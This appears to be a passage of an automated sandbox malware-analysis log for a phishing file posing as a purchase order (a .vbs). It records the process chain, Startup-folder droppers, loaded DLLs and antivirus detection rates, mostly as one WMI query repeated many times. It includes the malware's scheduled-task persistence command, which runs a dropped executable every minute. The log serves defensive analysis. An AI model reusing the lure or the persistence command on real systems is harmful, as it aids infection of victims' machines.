                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Purchase Order No. G02873362-Docx.vbs Virustotal: Detection: 37%
Source: Purchase Order No. G02873362-Docx.vbs ReversingLabs: Detection: 28%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
Source: unknown Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: srvcli.dll
